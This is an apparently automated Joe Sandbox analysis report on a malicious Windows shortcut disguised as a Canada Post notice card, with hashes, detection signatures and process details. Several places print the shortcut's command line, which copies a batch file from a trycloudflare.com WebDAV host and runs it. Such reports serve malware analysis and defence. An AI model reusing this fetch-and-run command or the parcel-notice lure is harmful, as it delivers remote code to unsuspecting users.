Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CanadaPostNoticeCard.download.lnk

Overview

General Information

Sample name:CanadaPostNoticeCard.download.lnk
Analysis ID:1542731
MD5:7ae270eb2a01528a4ca266ac565393d6
SHA1:71d2f5f77bc5e46774046a29ab3502c198a4f559
SHA256:e983feab214d68fd7232c239dbe96aaa50c636972ed4840d70b4c4aea898cbff
Tags:CloudflareTunnelsRATlnkuser-JAMESWT_MHT
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
Windows shortcut file (LNK) contains suspicious command line arguments
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7716 cmdline: "C:\Windows\System32\cmd.exe" /c copy /Y "\\stays-recipes-fold-day.trycloudflare.com@SSL\DavWWWRoot\bas.cmd" "C:\Users\user\Downloads\bas.cmd" & "C:\Users\user\Downloads\bas.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious Copy From or To System Directory
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /Y "\\stays-recipes-fold-day.trycloudflare.com@SSL\DavWWWRoot\bas.cmd" "C:\Users\user\Downloads\bas.cmd" & "C:\Users\user\Downloads\bas.cmd", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /Y "\\stays-recipes-fold-day.trycloudflare.com@SSL\DavWWWRoot\bas.cmd" "C:\Users\user\Downloads\bas.cmd" & "C:\Users\user\Downloads\bas.cmd", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /Y "\\stays-recipes-fold-day.trycloudflare.com@SSL\DavWWWRoot\bas.cmd" "C:\Users\user\Downloads\bas.cmd" & "C:\Users\user\Downloads\bas.cmd", ProcessId: 7716, ProcessName: cmd.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 83.0% probability
Machine Learning detection for sample
Source: CanadaPostNoticeCard.download.lnkJoe Sandbox ML: detected

System Summary

barindex
Windows shortcut file (LNK) contains suspicious command line arguments
Source: CanadaPostNoticeCard.download.lnkLNK file: /c copy /Y "\\stays-recipes-fold-day.trycloudflare.com@SSL\DavWWWRoot\bas.cmd" "%USERPROFILE%\Downloads\bas.cmd" & "%USERPROFILE%\Downloads\bas.cmd"
Source: classification engineClassification label: mal60.winLNK@2/0@0/0
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /Y "\\stays-recipes-fold-day.trycloudflare.com@SSL\DavWWWRoot\bas.cmd" "C:\Users\user\Downloads\bas.cmd" & "C:\Users\user\Downloads\bas.cmd"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection		1
Process Injection		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
File and Directory Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
CanadaPostNoticeCard.download.lnk0%ReversingLabs
CanadaPostNoticeCard.download.lnk3%VirustotalBrowse
CanadaPostNoticeCard.download.lnk100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1542731
Start date and time:2024-10-26 08:50:23 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 1m 36s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:3
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:CanadaPostNoticeCard.download.lnk
Detection:MAL
Classification:mal60.winLNK@2/0@0/0
Cookbook Comments:
  • Found application associated with file extension: .lnk
  • Stop behavior analysis, all processes terminated

Warnings

  • Exclude process from analysis (whitelisted): dllhost.exe
  • Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Sat May 8 07:14:16 2021, mtime=Sat May 8 07:14:16 2021, atime=Sat May 8 07:14:16 2021, length=331776, window=hidenormalshowminimized
Entropy (8bit):4.572131592605447
TrID:
  • Windows Shortcut (20020/1) 100.00%
File name:CanadaPostNoticeCard.download.lnk
File size:1'104 bytes
MD5:7ae270eb2a01528a4ca266ac565393d6
SHA1:71d2f5f77bc5e46774046a29ab3502c198a4f559
SHA256:e983feab214d68fd7232c239dbe96aaa50c636972ed4840d70b4c4aea898cbff
SHA512:210da8f567216e404cc4747f46c82e51b3312b667520762d98973a6d992411f3f7af89ce8517d53b4951ff4f148777f8579db1172072b741cbd863f2314a5f27
SSDEEP:24:8GdJ2mXNHcAbABPV+Ia4I0WaAbKjbKJ0m:8Gymda/+SI8yAv
TLSH:A211D04073ED9722E2B70D7309AAE7628771B0179F8AAF2E419458995D50F10E834F77
File Content Preview:L..................F.... .....}#.C....}#.C....}#.C..........................5....P.O. .:i.....+00.../C:\...................V.1......X.U..Windows.@........R.@.X.U..............................W.i.n.d.o.w.s.....Z.1......X.V..System32..B........R.@.X.V......

File Icon

Icon Hash:74f4d4dcdcc9e1ed

Static Windows Shortcut Info

General

Relative Path:
Command Line Argument:/c copy /Y "\\stays-recipes-fold-day.trycloudflare.com@SSL\DavWWWRoot\bas.cmd" "%USERPROFILE%\Downloads\bas.cmd" & "%USERPROFILE%\Downloads\bas.cmd"
Icon location:%SystemRoot%\System32\SHELL32.dll

Network Behavior

No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

General

Target ID:1
Start time:02:51:18
Start date:26/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c copy /Y "\\stays-recipes-fold-day.trycloudflare.com@SSL\DavWWWRoot\bas.cmd" "C:\Users\user\Downloads\bas.cmd" & "C:\Users\user\Downloads\bas.cmd"
Imagebase:0x7ff761c60000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:2
Start time:02:51:18
Start date:26/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff70f010000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Disassembly

No disassembly